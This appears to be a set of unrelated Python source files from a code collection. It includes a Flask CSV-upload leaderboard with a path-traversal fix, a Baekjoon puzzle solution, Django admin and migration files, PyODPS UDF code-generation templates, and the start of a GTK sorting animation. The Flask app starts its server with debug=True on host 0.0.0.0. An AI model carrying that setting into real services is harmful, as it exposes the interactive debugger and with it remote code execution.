    return render_template("index.html", rankings = rankings)
@app.route("/upload", methods=["POST"])
def upload():
    """Accept a CSV submission, score it, and redirect to the leaderboard.

    The submitter id and file come from an untrusted form, so the id is
    sanitised before being used to build a filename.
    """
    if request.method == "POST":
        s_id = (request.form["register_name"])
        f = request.files["csv_file"]
        user_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
        if f.headers["Content-Type"]=="text/csv":
            # Security fix: s_id used to be interpolated into the path
            # verbatim, allowing traversal like "../../x".  Keep only word
            # characters, dots and dashes so the file stays in ./reported/.
            import re
            safe_id = re.sub(r'[^\w.-]', '_', s_id)
            path = f"./reported/{safe_id}.csv"
            f.save(path)
            message = scr.write(path, s_id, f.filename, user_ip)
            flash(message)
        else:
            flash("CSV파일이 아닙니다. CSV파일을 제출해주세요.")
    else:
        abort(404)
    return redirect(url_for("index"))


if __name__ == "__main__":
    app.run(debug=True, port=3000, host="0.0.0.0", threaded=True)
998,313 | 5247b51b7a23a5abd04dcc7482f4de49f2b93e9a | # Title: 카드2
# Link: https://www.acmicpc.net/problem/2164
import sys
from collections import deque as dq
sys.setrecursionlimit(10 ** 6)  # boilerplate from a solution template; unused here
read_single_int = lambda: int(sys.stdin.readline().strip())  # fast stdin integer reader
def solution(n: int):
    """Card game (BOJ 2164): repeatedly discard the top card and move the
    next one to the bottom; return the last remaining card."""
    cards = dq(range(1, n + 1))
    while len(cards) > 1:
        cards.popleft()                 # throw the top card away
        cards.append(cards.popleft())   # next card goes under the deck
    return cards[0]
def main():
    # Read N from stdin and print the last remaining card.
    n = read_single_int()
    print(solution(n))


if __name__ == '__main__':
    main()
998,314 | a226a3dd236d5d9f89ff5caa577be716af30ff36 | from django.contrib import admin
from mailing.models import SystemEmail
from djcelery.models import TaskState, WorkerState, PeriodicTask, IntervalSchedule, CrontabSchedule
@admin.register(SystemEmail)
class SystemEmailAdmin(admin.ModelAdmin):
    """Default admin interface for outbound system e-mails."""
    pass


# Hide django-celery's bookkeeping models from the admin index.
admin.site.unregister(TaskState)
admin.site.unregister(WorkerState)
admin.site.unregister(IntervalSchedule)
admin.site.unregister(CrontabSchedule)
admin.site.unregister(PeriodicTask)
998,315 | 096ed24c2195c91ae8938ecfeabab760afef7993 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2022 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import inspect
import os
import platform
import sys
import uuid
from collections import OrderedDict
from .types import df_type_to_odps_type
from ...expr.collections import RowAppliedCollectionExpr
from ...expr.element import MappedExpr
from ...expr.reduction import Aggregation, GroupedAggregation
from ...expr.utils import get_executed_collection_project_table_name
from ...utils import make_copy
from ....config import options
from ....lib import cloudpickle
from ....compat import six
from ....models import FileResource, TableResource, ArchiveResource
from ....utils import to_str
# Read the helper module sources (cloudpickle, in-memory importer,
# xnamedtuple) so they can be inlined into the generated UDF script text.
dirname = os.path.dirname(os.path.abspath(cloudpickle.__file__))
CLOUD_PICKLE_FILE = os.path.join(dirname, 'cloudpickle.py')
with open(CLOUD_PICKLE_FILE) as f:
    CLOUD_PICKLE = f.read()
IMPORT_FILE = os.path.join(dirname, 'importer.py')
with open(IMPORT_FILE) as f:
    MEM_IMPORT = f.read()
# Client interpreter fingerprint, e.g. '(3, 7, "cpython")', embedded in the
# UDF and passed to the unpickler as its `impl` argument.
CLIENT_IMPL = '(%d, %d, "%s")' % (sys.version_info[0],
                                  sys.version_info[1],
                                  platform.python_implementation().lower())
X_NAMED_TUPLE_FILE = os.path.join(dirname, 'xnamedtuple.py')
with open(X_NAMED_TUPLE_FILE) as f:
    X_NAMED_TUPLE = f.read()
UDF_TMPL_HEADER = '''\
%(cloudpickle)s
%(memimport)s
%(xnamedtuple)s
try:
# workaround for character not in range error
import _strptime
except:
pass
import sys
# avoid conflict between protobuf binaries
sys.setdlopenflags(10)
import base64
import inspect
import time
import os
try:
import faulthandler
faulthandler.enable(all_threads=True)
except ImportError:
pass
from odps.udf import annotate
from odps.distcache import get_cache_file, get_cache_table, get_cache_archive
PY2 = sys.version_info[0] == 2
try:
from odps.distcache import get_cache_archive_filenames
except ImportError:
def get_cache_archive_filenames(name, relative_path='.'):
from odps.distcache import WORK_DIR, DistributedCacheError
def _is_parent(parent, child):
return parent == child or child.startswith(parent + '/')
if os.path.split(name)[0] != '':
raise DistributedCacheError("Invalid resource name: " + name)
ret_files = []
# find the real resource path to avoid the symbol link in inner system
resourcepath = os.path.realpath(os.path.join(WORK_DIR, name))
# use realpath == abspath to check the symbol link
dirpath = os.path.join(resourcepath, relative_path)
if not os.path.exists(dirpath):
raise DistributedCacheError("Invalid relative path, file not exists: " + relative_path)
if os.path.realpath(dirpath) != os.path.abspath(dirpath):
raise DistributedCacheError("Invalid relative path, relative path contains symlink: " + relative_path)
if not _is_parent(resourcepath, dirpath):
raise DistributedCacheError("Invalid relative path, path not correct in archive: " + relative_path)
if not os.path.isdir(dirpath):
return [dirpath]
for root, dirs, files in os.walk(dirpath):
for f in dirs:
filename = os.path.join(root, f)
if os.path.islink(filename):
relativename = os.path.relpath(filename, resourcepath)
raise DistributedCacheError("Invalid relative path, relative path contains symlink: " + relativename)
for f in files:
filename = os.path.join(root, f)
if os.path.islink(filename):
relativename = os.path.relpath(filename, resourcepath)
raise DistributedCacheError("Invalid relative path, relative path contains symlink: " + relativename)
ret_files.append(filename)
return ret_files
def get_cache_archive_data(name, relative_path='.'):
try:
return [os.path.normpath(f) for f in get_cache_archive_filenames(name, relative_path)]
except RuntimeError:
return {os.path.normpath(fo.name): fo for fo in get_cache_archive(name, relative_path)}
class UnbufferedStream(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def writelines(self, datas):
self.stream.writelines(datas)
self.stream.flush()
def __getattr__(self, attr):
if attr != 'stream':
return getattr(self.stream, attr)
else:
return object.__getattribute__(self, 'stream')
def __setattr__(self, attr, value):
if attr != 'stream':
return setattr(self.stream, attr, value)
else:
return object.__setattr__(self, 'stream', value)
sys.stdout = UnbufferedStream(sys.stdout)
try:
import socket
except ImportError:
class MockSocketModule(object):
_GLOBAL_DEFAULT_TIMEOUT = object()
def __getattr__(self, item):
raise AttributeError('Accessing attribute `{0}` of module `socket` is prohibited by sandbox.'.format(item))
sys.modules['socket'] = MockSocketModule()
def gen_resource_data(fields, tb):
named_args = xnamedtuple('NamedArgs', fields)
for args in tb:
yield named_args(*args)
def read_lib(lib, f):
if isinstance(f, (list, dict)):
return f
if lib.endswith('.zip') or lib.endswith('.egg') or lib.endswith('.whl'):
if PY2 and hasattr(f, "read"):
return zipfile.ZipFile(f)
else:
return zipfile.ZipFile(f.name)
if lib.endswith('.tar') or lib.endswith('.tar.gz') or lib.endswith('.tar.bz2'):
from io import BytesIO
if lib.endswith('.tar'):
mode = 'r'
else:
mode = 'r:gz' if lib.endswith('.tar.gz') else 'r:bz2'
if PY2 and hasattr(f, "read"):
return tarfile.open(name='', fileobj=f, mode=mode)
else:
return tarfile.open(name=f.name, mode=mode)
if lib.endswith('.py'):
if PY2 and hasattr(f, "read"):
return {f.name: f}
else:
return {f.name: open(f.name, 'rb')}
raise ValueError(
'Unknown library type which should be one of zip(egg, wheel), tar, or tar.gz')
# Use this method to make testThirdPartyLibraries happy
np_generic = None
def load_np_generic():
global np_generic
try:
from numpy import generic
np_generic = generic
except ImportError:
class PseudoNpGeneric(object):
pass
np_generic = PseudoNpGeneric
''' % {
'cloudpickle': CLOUD_PICKLE,
'memimport': MEM_IMPORT,
'xnamedtuple': X_NAMED_TUPLE,
}
UDF_TMPL = '''
@annotate('%(from_type)s->%(to_type)s')
class %(func_cls_name)s(object):
def __init__(self):
unpickler_kw = dict(impl=%(implementation)s, dump_code=%(dump_code)s)
rs = loads(base64.b64decode('%(resources)s'), **unpickler_kw)
resources = []
for t, n, fields in rs:
if t == 'file':
resources.append(get_cache_file(str(n)))
elif t == 'archive':
resources.append(get_cache_archive(str(n)))
else:
tb = get_cache_table(str(n))
if fields:
tb = gen_resource_data(fields, tb)
resources.append(tb)
libraries = (l for l in '%(libraries)s'.split(',') if len(l) > 0)
files = []
for lib in libraries:
if lib.startswith('a:'):
lib = lib[2:]
f = get_cache_archive_data(lib)
else:
f = get_cache_file(lib)
files.append(read_lib(lib, f))
sys.meta_path.append(CompressImporter(*files, supersede=%(supersede_libraries)r))
load_np_generic()
encoded = '%(func_str)s'
f_str = base64.b64decode(encoded)
self.f = loads(f_str, **unpickler_kw)
if inspect.isclass(self.f):
if resources:
self.f = self.f(resources)
else:
self.f = self.f()
else:
if resources:
self.f = self.f(resources)
self.names = tuple(it for it in '%(names_str)s'.split(',') if it)
if self.names:
self.named_args = xnamedtuple('NamedArgs', self.names)
encoded_func_args = '%(func_args_str)s'
func_args_str = base64.b64decode(encoded_func_args)
self.args = loads(func_args_str, **unpickler_kw) or tuple()
encoded_func_kwargs = '%(func_kwargs_str)s'
func_kwargs_str = base64.b64decode(encoded_func_kwargs)
self.kwargs = loads(func_kwargs_str, **unpickler_kw) or dict()
self.from_types = '%(raw_from_type)s'.split(',')
self.to_type = '%(to_type)s'
def _handle_input(self, args):
from datetime import datetime
from decimal import Decimal
res = []
for t, arg in zip(self.from_types, args):
if PY2 and t == 'datetime' and arg is not None and not isinstance(arg, datetime):
res.append(datetime.fromtimestamp(arg / 1000.0))
elif t == 'decimal' and arg is not None and isinstance(arg, str):
res.append(Decimal(arg))
else:
res.append(arg)
return res
def _to_milliseconds(self, dt):
return int((time.mktime(dt.timetuple()) + dt.microsecond/1000000.0) * 1000)
def _handle_output(self, arg):
from datetime import datetime
from decimal import Decimal
t = self.to_type
if PY2 and t == 'datetime' and isinstance(arg, datetime):
if isinstance(arg, np_generic):
arg = arg.item()
return self._to_milliseconds(arg)
elif t == 'string' and isinstance(arg, Decimal):
return str(arg)
else:
if isinstance(arg, np_generic):
arg = arg.item()
return arg
def evaluate(self, %(input_args)s):
args = %(input_args)s,
args = self._handle_input(args)
if not self.names:
args = tuple(args) + tuple(self.args)
res = self.f(*args, **self.kwargs)
return self._handle_output(res)
else:
res = self.f(self.named_args(*args), *self.args, **self.kwargs)
return self._handle_output(res)
'''
UDTF_TMPL = '''
import functools
from odps.udf import BaseUDTF
if PY2:
string_type = unicode
byte_type = str
else:
string_type = str
byte_type = (bytes, bytearray)
@annotate('%(from_type)s->%(to_type)s')
class %(func_cls_name)s(BaseUDTF):
def __init__(self):
unpickler_kw = dict(impl=%(implementation)s, dump_code=%(dump_code)s)
rs = loads(base64.b64decode('%(resources)s'), **unpickler_kw)
resources = []
for t, n, fields in rs:
if t == 'file':
resources.append(get_cache_file(str(n)))
elif t == 'archive':
resources.append(get_cache_archive(str(n)))
else:
tb = get_cache_table(str(n))
if fields:
tb = gen_resource_data(fields, tb)
resources.append(tb)
libraries = (l for l in '%(libraries)s'.split(',') if len(l) > 0)
files = []
for lib in libraries:
if lib.startswith('a:'):
lib = lib[2:]
f = get_cache_archive_data(lib)
else:
f = get_cache_file(lib)
files.append(read_lib(lib, f))
sys.meta_path.append(CompressImporter(*files, supersede=%(supersede_libraries)r))
load_np_generic()
encoded = '%(func_str)s'
f_str = base64.b64decode(encoded)
self.f = loads(f_str, **unpickler_kw)
if inspect.isclass(self.f):
if not resources:
self.f = self.f()
else:
self.f = self.f(resources)
self.is_f_generator = inspect.isgeneratorfunction(self.f.__call__)
self.close_f = getattr(self.f, 'close', None)
self.is_close_f_generator = inspect.isgeneratorfunction(self.close_f)
else:
if resources:
self.f = self.f(resources)
if isinstance(self.f, functools.partial):
self.is_f_generator = inspect.isgeneratorfunction(self.f.func)
else:
self.is_f_generator = inspect.isgeneratorfunction(self.f)
self.close_f = None
self.is_close_f_generator = False
encoded_func_args = '%(func_args_str)s'
func_args_str = base64.b64decode(encoded_func_args)
self.args = loads(func_args_str, **unpickler_kw) or tuple()
encoded_func_kwargs = '%(func_kwargs_str)s'
func_kwargs_str = base64.b64decode(encoded_func_kwargs)
self.kwargs = loads(func_kwargs_str, **unpickler_kw) or dict()
self.names = tuple(it for it in '%(names_str)s'.split(',') if it)
if self.names:
self.name_args = xnamedtuple('NamedArgs', self.names)
self.from_types = '%(raw_from_type)s'.split(',')
self.to_types = '%(to_type)s'.split(',')
def _handle_input(self, args):
from datetime import datetime
from decimal import Decimal
res = []
for t, arg in zip(self.from_types, args):
if PY2 and t == 'datetime' and arg is not None and not isinstance(arg, datetime):
res.append(datetime.fromtimestamp(arg / 1000.0))
elif t == 'decimal' and arg is not None and not isinstance(arg, Decimal):
res.append(Decimal(arg))
else:
res.append(arg)
return res
def _to_milliseconds(self, dt):
return int((time.mktime(dt.timetuple()) + dt.microsecond/1000000.0) * 1000)
def _handle_output(self, args):
from datetime import datetime
from decimal import Decimal
if len(self.to_types) != len(args):
raise ValueError('Function output size should be ' + str(len(self.to_types))
+ ', got ' + str(args))
res = []
for t, arg in zip(self.to_types, args):
if PY2 and t == 'datetime' and isinstance(arg, datetime):
if isinstance(arg, np_generic):
arg = arg.item()
res.append(self._to_milliseconds(arg))
elif t == 'string' and isinstance(arg, Decimal):
res.append(str(arg))
elif PY2 and t == 'string' and isinstance(arg, string_type):
res.append(arg.encode('utf-8'))
elif PY3 and t == 'string' and isinstance(arg, byte_type):
res.append(arg.decode('utf-8'))
else:
if isinstance(arg, np_generic):
arg = arg.item()
res.append(arg)
return res
def process(self, %(input_args)s):
args = %(input_args)s,
args = self._handle_input(args)
if not self.names:
args = tuple(args) + tuple(self.args)
else:
args = (self.name_args(*args), ) + tuple(self.args)
if self.is_f_generator:
for r in self.f(*args, **self.kwargs):
if not isinstance(r, (list, tuple)):
r = (r, )
self.forward(*self._handle_output(r))
else:
res = self.f(*args, **self.kwargs)
if res:
if not isinstance(res, (list, tuple)):
res = (res, )
self.forward(*self._handle_output(res))
def close(self):
if not self.close_f:
return
if self.is_close_f_generator:
for r in self.close_f(*self.args, **self.kwargs):
if not isinstance(r, (list, tuple)):
r = (r, )
self.forward(*self._handle_output(r))
else:
res = self.close_f(*self.args, **self.kwargs)
if res:
if not isinstance(res, (list, tuple)):
res = (res, )
self.forward(*self._handle_output(res))
'''
UDAF_TMPL = '''
from odps.udf import BaseUDAF
@annotate('%(from_type)s->%(to_type)s')
class %(func_cls_name)s(BaseUDAF):
def __init__(self):
unpickler_kw = dict(impl=%(implementation)s, dump_code=%(dump_code)s)
rs = loads(base64.b64decode('%(resources)s'), **unpickler_kw)
resources = []
for t, n, fields in rs:
if t == 'file':
resources.append(get_cache_file(str(n)))
elif t == 'archive':
resources.append(get_cache_archive(str(n)))
else:
tb = get_cache_table(str(n))
if fields:
tb = gen_resource_data(fields, tb)
resources.append(tb)
libraries = (l for l in '%(libraries)s'.split(',') if len(l) > 0)
files = []
for lib in libraries:
if lib.startswith('a:'):
lib = lib[2:]
f = get_cache_archive_data(lib)
else:
f = get_cache_file(lib)
files.append(read_lib(lib, f))
sys.meta_path.append(CompressImporter(*files, supersede=%(supersede_libraries)r))
load_np_generic()
encoded_func_args = '%(func_args_str)s'
func_args_str = base64.b64decode(encoded_func_args)
args = loads(func_args_str, **unpickler_kw) or tuple()
encoded_func_kwargs = '%(func_kwargs_str)s'
func_kwargs_str = base64.b64decode(encoded_func_kwargs)
kwargs = loads(func_kwargs_str, **unpickler_kw) or dict()
encoded = '%(func_str)s'
f_str = base64.b64decode(encoded)
agg = loads(f_str, **unpickler_kw)
if resources:
if not args and not kwargs:
self.f = agg(resources)
else:
kwargs['resources'] = resources
self.f = agg(*args, **kwargs)
else:
self.f = agg(*args, **kwargs)
self.from_types = '%(raw_from_type)s'.split(',')
self.to_type = '%(to_type)s'
def _handle_input(self, args):
from datetime import datetime
from decimal import Decimal
res = []
for t, arg in zip(self.from_types, args):
if PY2 and t == 'datetime' and arg is not None and not isinstance(arg, datetime):
res.append(datetime.fromtimestamp(arg / 1000.0))
elif t == 'decimal' and arg is not None and not isinstance(arg, Decimal):
res.append(Decimal(arg))
else:
res.append(arg)
return res
def _to_milliseconds(self, dt):
return int((time.mktime(dt.timetuple()) + dt.microsecond/1000000.0) * 1000)
def _handle_output(self, arg):
from datetime import datetime
from decimal import Decimal
t = self.to_type
if PY2 and t == 'datetime' and isinstance(arg, datetime):
if isinstance(arg, np_generic):
arg = arg.item()
return self._to_milliseconds(arg)
elif t == 'string' and isinstance(arg, Decimal):
return str(arg)
else:
if isinstance(arg, np_generic):
arg = arg.item()
return arg
def new_buffer(self):
return self.f.buffer()
def iterate(self, buffer, %(input_args)s):
args = %(input_args)s,
args = self._handle_input(args)
self.f(buffer, *args)
def merge(self, buffer, pbuffer):
self.f.merge(buffer, pbuffer)
def terminate(self, buffer):
res = self.f.getvalue(buffer)
return self._handle_output(res)
'''
def _gen_map_udf(node, func_cls_name, libraries, func, resources,
                 func_to_udfs, func_to_resources, func_params):
    # Render scalar-UDF source for a mapped expression `node` into
    # `func_to_udfs` (keyed by the callable).  Identical combinations of
    # (types, func, resources, names, args) are deduplicated via `func_params`.
    names_str = ''
    if isinstance(node, MappedExpr) and node._multiple and \
            all(f.name is not None for f in node.inputs):
        # multi-input call with every input named: pass the names through so
        # the generated UDF wraps each row in a namedtuple (see UDF_TMPL)
        names_str = ','.join(f.name for f in node.inputs)
    from_type = ','.join(df_type_to_odps_type(t).name for t in node.input_types)
    to_type = df_type_to_odps_type(node.dtype).name
    raw_from_type = ','.join(df_type_to_odps_type(t).name for t in node.raw_input_types)
    # args/kwargs travel as base64-encoded cloudpickle payloads
    func_args_str = to_str(
        base64.b64encode(cloudpickle.dumps(node._func_args, dump_code=options.df.dump_udf)))
    func_kwargs_str = to_str(
        base64.b64encode(cloudpickle.dumps(node._func_kwargs, dump_code=options.df.dump_udf)))
    if inspect.isfunction(func) and not func.__closure__:
        # closure-free plain functions can be identified by their code object
        func_sig = id(func.__code__)
    else:
        func_sig = func
    key = (from_type, to_type, func_sig, tuple(resources), names_str, func_args_str, func_kwargs_str)
    if key in func_params:
        # identical UDF already generated; reuse its callable on this node
        node.func = func_params[key]
        return
    else:
        if func in func_to_udfs:
            # same callable already generated under a different signature:
            # copy it so func_to_udfs keys stay distinct
            func = make_copy(func)
            node.func = func
        func_params[key] = func
        func_to_udfs[func] = UDF_TMPL_HEADER + UDF_TMPL % {
            'raw_from_type': raw_from_type,
            'from_type': from_type,
            'to_type': to_type,
            'func_cls_name': func_cls_name,
            'func_str': to_str(base64.b64encode(cloudpickle.dumps(func, dump_code=options.df.dump_udf))),
            'func_args_str': func_args_str,
            'func_kwargs_str': func_kwargs_str,
            'names_str': names_str,
            'resources': to_str(
                base64.b64encode(cloudpickle.dumps([r[:3] for r in resources], dump_code=options.df.dump_udf))),
            'implementation': CLIENT_IMPL,
            'dump_code': options.df.dump_udf,
            'input_args': ', '.join('arg{0}'.format(i) for i in range(len(node.input_types))),
            'libraries': ','.join(libraries if libraries is not None else []),
            'supersede_libraries': options.df.supersede_libraries,
        }
        if resources:
            func_to_resources[func] = resources
def _gen_apply_udf(node, func_cls_name, libraries, func, resources,
                   func_to_udfs, func_to_resources, func_params):
    # Render UDTF source for a row-applied collection expression `node`,
    # mirroring _gen_map_udf: build the type signature and pickled payloads,
    # deduplicate identical generations through `func_params`, and record the
    # generated source in `func_to_udfs` (resource specs in `func_to_resources`).
    names_str = ','.join(f.name for f in node.fields)
    from_type = ','.join(df_type_to_odps_type(t).name for t in node.input_types)
    raw_from_type = ','.join(df_type_to_odps_type(t).name for t in node.raw_input_types)
    to_type = ','.join(df_type_to_odps_type(t).name for t in node.schema.types)
    func_args_str = to_str(
        base64.b64encode(cloudpickle.dumps(node._func_args, dump_code=options.df.dump_udf)))
    func_kwargs_str = to_str(
        base64.b64encode(cloudpickle.dumps(node._func_kwargs, dump_code=options.df.dump_udf)))
    key = (from_type, to_type, func, tuple(resources), names_str, func_args_str, func_kwargs_str)
    if key in func_params:
        # identical UDTF already generated for this signature
        return
    else:
        if func in func_to_udfs:
            # same callable already generated under a different signature:
            # copy it so func_to_udfs keys stay distinct
            func = make_copy(func)
            node.func = func
        func_params[key] = func
        func_to_udfs[func] = UDF_TMPL_HEADER + UDTF_TMPL % {
            'raw_from_type': raw_from_type,
            'from_type': from_type,
            'to_type': to_type,
            'func_cls_name': func_cls_name,
            'func_str': to_str(base64.b64encode(cloudpickle.dumps(func, dump_code=options.df.dump_udf))),
            'func_args_str': func_args_str,
            'func_kwargs_str': func_kwargs_str,
            # NOTE: UDTF_TMPL does not currently reference %(close_func_str)s;
            # the extra mapping key is harmless under %-formatting.
            'close_func_str': to_str(
                base64.b64encode(cloudpickle.dumps(getattr(node, '_close_func', None), dump_code=options.df.dump_udf))),
            'names_str': names_str,
            # fix: honor options.df.dump_udf when pickling resource specs,
            # consistent with _gen_map_udf and _gen_agg_udf
            'resources': to_str(base64.b64encode(
                cloudpickle.dumps([r[:3] for r in resources], dump_code=options.df.dump_udf))),
            'implementation': CLIENT_IMPL,
            'dump_code': options.df.dump_udf,
            'input_args': ', '.join('arg{0}'.format(i) for i in range(len(node.input_types))),
            'libraries': ','.join(libraries if libraries is not None else []),
            'supersede_libraries': options.df.supersede_libraries,
        }
        if resources:
            func_to_resources[func] = resources
def _gen_agg_udf(node, func_cls_name, libraries, func, resources,
                 func_to_udfs, func_to_resources, func_params):
    # Render UDAF source for an aggregation `node`; see _gen_map_udf for the
    # overall generation/deduplication scheme.
    def _pickle64(obj):
        # cloudpickle + base64, honoring the df.dump_udf option
        return to_str(base64.b64encode(cloudpickle.dumps(obj, dump_code=options.df.dump_udf)))

    from_type = ','.join(df_type_to_odps_type(t).name for t in node.input_types)
    raw_from_type = ','.join(df_type_to_odps_type(t).name for t in node.raw_input_types)
    to_type = df_type_to_odps_type(node.dtype).name
    func_args_str = _pickle64(node._func_args)
    func_kwargs_str = _pickle64(node._func_kwargs)
    key = (from_type, to_type, func, tuple(resources), func_args_str, func_kwargs_str)
    if key in func_params:
        # identical UDAF already generated for this signature
        return
    if func in func_to_udfs:
        # callable already generated under another signature: copy it so the
        # func_to_udfs keys stay distinct
        func = make_copy(func)
        node.func = func
    func_params[key] = func
    template_params = {
        'raw_from_type': raw_from_type,
        'from_type': from_type,
        'to_type': to_type,
        'func_cls_name': func_cls_name,
        'func_str': _pickle64(func),
        'func_args_str': func_args_str,
        'func_kwargs_str': func_kwargs_str,
        'resources': _pickle64([r[:3] for r in resources]),
        'implementation': CLIENT_IMPL,
        'dump_code': options.df.dump_udf,
        'input_args': ', '.join('arg{0}'.format(ix) for ix in range(len(node.input_types))),
        'libraries': ','.join(libraries if libraries is not None else []),
        'supersede_libraries': options.df.supersede_libraries,
    }
    func_to_udfs[func] = UDF_TMPL_HEADER + UDAF_TMPL % template_params
    if resources:
        func_to_resources[func] = resources
def gen_udf(expr, func_cls_name=None, libraries=None):
    # Walk `expr` and generate UDF/UDTF/UDAF source for every node carrying a
    # Python callable.  Returns (func_to_udfs, func_to_resources):
    # callable -> generated source, and callable -> resource spec list.
    func_to_udfs = OrderedDict()
    func_to_resources = OrderedDict()
    func_params = dict()
    if libraries is not None:
        def _get_library_name(res):
            # archive resources are tagged 'a:' so the generated bootstrap
            # fetches them via get_cache_archive_data instead of get_cache_file
            if isinstance(res, six.string_types):
                return res
            elif isinstance(res, ArchiveResource):
                return 'a:' + res.name
            else:
                return res.name
        libraries = [_get_library_name(lib) for lib in libraries]
    for node in expr.traverse(unique=True):
        func = getattr(node, 'func', None)
        if func is None:
            continue
        if isinstance(func, six.string_types):
            # function referenced by name: no source to generate
            continue
        # build (type, name, fields, create, table_name) specs for each
        # resource declared on the node
        resources = []
        collection_idx = 0
        if hasattr(node, '_resources') and node._resources:
            for res in node._resources:
                if isinstance(res, ArchiveResource):
                    tp = 'archive'
                    name = res.name
                    fields = None
                    create = False
                    table_name = None
                elif isinstance(res, FileResource):
                    tp = 'file'
                    name = res.name
                    fields = None
                    create = False
                    table_name = None
                elif isinstance(res, TableResource):
                    tp = 'table'
                    name = res.name
                    fields = tuple(col.name for col in res.get_source_table().table_schema.simple_columns)
                    create = False
                    table_name = None
                else:
                    # collection resource: expose it as a table resource with
                    # a generated temporary name, flagged for creation
                    res = node._collection_resources[collection_idx]
                    collection_idx += 1
                    tp = 'table'
                    name = 'tmp_pyodps_resource_%s' % (uuid.uuid4())
                    fields = tuple(res.schema.names)
                    create = True
                    table_name = get_executed_collection_project_table_name(res)
                resources.append((tp, name, fields, create, table_name))
        # dispatch on node kind to the matching generator
        if isinstance(node, MappedExpr):
            _gen_map_udf(node, func_cls_name, libraries, func, resources,
                         func_to_udfs, func_to_resources, func_params)
        elif isinstance(node, RowAppliedCollectionExpr):
            _gen_apply_udf(node, func_cls_name, libraries, func, resources,
                           func_to_udfs, func_to_resources, func_params)
        elif isinstance(node, (Aggregation, GroupedAggregation)):
            _gen_agg_udf(node, func_cls_name, libraries, func, resources,
                         func_to_udfs, func_to_resources, func_params)
    return func_to_udfs, func_to_resources
|
998,316 | 258bf0913b27ae77a20bb23f2334050aceddd18d | # Generated by Django 3.1.2 on 2021-11-13 21:13
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Alter Vote.post: FK to posts.Post with related_name='votes'
    # (reverse accessor post.votes) and CASCADE on delete.

    dependencies = [
        ('posts', '0006_vote_created_at'),
    ]

    operations = [
        migrations.AlterField(
            model_name='vote',
            name='post',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes', to='posts.post'),
        ),
    ]
|
998,317 | 330c3d14a1203ad040f4635e6212788edc14bd8b | from teacher import *
# Demo driver: exercise the student and teacher classes from teacher.py.
stu = student()
stu.set_details(124, "prasad", "tirupati")
for detail in stu.get_details():
    print(detail)

tch = teacher()
tch.set_student_details(125)
print(tch.get_student_details())
|
998,318 | 4cd259ea483b9d89c61b9185cc3b962b2ffcb869 | import argparse
class ArgumentsBase(object):
def __init__(self):
self.parser = argparse.ArgumentParser()
parser = self.parser
# gpu id
parser.add_argument('-gs', '--gpu-ids', type=int, nargs='+',
help='multiple gpu device ids to train the network')
# the data set
parser.add_argument('-b', '--batch-size', required=True, type=int, help='mini-batch size')
parser.add_argument('-nw', '--num-workers', default=4, type=int, help='workers for loading data')
# logfile info
parser.add_argument('-en', '--environment', type=str, default='main', help='log environment for visdom')
# model info
parser.add_argument('-model', '--model-name', type=str, required=True,
help='model name')
parser.add_argument('-nc', '--num_classes', type=int, default=1000, help='number of the classes')
def parse_args(self):
return self.parser.parse_args()
|
998,319 | 5de0089eaaec2efe7b76158aff51c394aa04e290 | #!/usr/bin/python3
#+
# glibcoro example: an animated display of a sorting algorithm.
# This script takes the following options:
#
# --algorithm=algorithm
# (required) specifies which sorting algorithm to demonstrate. Currently-valid
# values are "bubblesort", "quicksort" and "shellsort".
# --enddelay=t
# the number of seconds to delay before quitting after the algorithm completes,
# decimals allowed. If omitted, defaults to 5.0.
# --nrelements=n
# the number of elements in the array to be sorted. If omitted, defaults to 10.
# --ordered=f
# the fraction of elements to be initially ordered, decimals allowed, 0.0 to
# completely randomize their order, 1.0 to leave them completely ordered, -1.0 to
# have them in completely reverse order. If omitted, defaults to 0.0.
# --startdelay=t
# the number of seconds to delay before starting the sort,
# decimals allowed. If omitted, defaults to 3.0.
# --step=t
# the number of seconds to delay between element swaps, decimals allowed. If
# omitted, defaults to 1.0.
#
# Copyright 2009-2017 Lawrence D'Oliveiro <ldo@geek-central.gen.nz>.
# Licensed under CC-BY <http://creativecommons.org/licenses/by/4.0/>.
#-
import sys
import signal
import colorsys
import random
import asyncio
# docs: <https://pygobject.readthedocs.io/en/latest/>
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import \
Gtk
import glibcoro
import getopt
glibcoro.install()
loop = asyncio.get_event_loop()
#+
# Misc useful stuff
#-
class SortClass :
    "abstract base class for sort algorithms."

    def compare(self, a, b) :
        "return True iff the elements at indices a and b are already in the right order."
        raise NotImplementedError("must be overridden")
    #end compare

    async def swap(self, a, b) :
        "exchange the elements at indices a and b."
        raise NotImplementedError("must be overridden")
    #end swap

    async def sort(self) :
        "run the actual sort algorithm."
        raise NotImplementedError("must be overridden")
    #end sort

#end SortClass
def new_label() :
    "returns a Label widget meant to hold variable text, pre-filled with" \
    " placeholder characters to force a reasonable minimum width."
    return Gtk.Label("W" * 10)
#end new_label
#+
# Animation management
#-
def draw_background(da, ctx) :
    "draw handler: fills the widget's window with the pale background colour."
    _, _, width, height = da.get_parent_window().get_geometry()
    ctx.set_source_rgb(*colorsys.hsv_to_rgb(0.55, 0.25, 0.75))
    ctx.rectangle(0, 0, width, height)
    ctx.fill()
#end draw_background
class ItemWidget :
    "manages rendition of an array sort element."

    def __init__(self) :
        self.display_widget = Gtk.DrawingArea()
        self.display_widget.set_size_request(100, 8)
        self.value = None
        self.selected = False
        self.display_widget.connect("draw", self.draw)
    #end __init__

    def draw(self, da, ctx) :
        "draw handler: bar length proportional to value; highlighted when selected."
        if self.selected :
            hsv = (0, 0.5, 0.75)
        else :
            hsv = (0.18, 1, 0.85)
        #end if
        ctx.set_source_rgb(*colorsys.hsv_to_rgb(*hsv))
        ctx.rectangle \
          (
            0, 0,
            round(da.get_allocated_width() * self.value / nr_sort_items),
            da.get_allocated_height()
          )
        ctx.fill()
    #end draw

    def set_value(self, new_value) :
        "updates the element value, queueing a redraw only on change."
        if new_value != self.value :
